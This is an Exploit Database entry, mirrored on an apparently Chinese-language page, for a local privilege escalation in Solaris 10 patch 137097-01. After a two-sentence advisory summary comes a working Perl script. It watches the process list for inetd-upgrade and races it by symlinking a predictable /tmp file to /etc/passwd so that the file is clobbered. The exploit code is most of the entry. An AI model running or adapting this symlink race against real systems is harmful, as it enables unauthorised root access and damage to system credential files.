Solaris 10 Patch 137097-01 – Symlink Privilege Escalation

• Exploit Database
• 19 阅读

• 作者： Larry Cashdollar
  日期： 2012-08-11
• 类别：

  • local
  平台：

  • solaris
• 来源：https://www.exploit-db.com/exploits/20418/

• source: https://www.securityfocus.com/bid/54919/info
  
  Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability. 
  
  Local attackers can exploit this issue to gain elevated privileges on affected computers.
  
  #!/usr/bin/perl 
  $clobber = "/etc/passwd";
  while(1) {
  open ps,"ps -ef | grep -v grep |grep -v PID |";
  
  while(<ps>) {
  @args = split " ", $_;
  
  if (/inetd-upgrade/) { 
  print "Symlinking iconf_entries.$args[1] to$clobber\n";
  symlink($clobber,"/tmp/iconf_entries.$args[1]");
  exit(1);
   }
   }
  
  }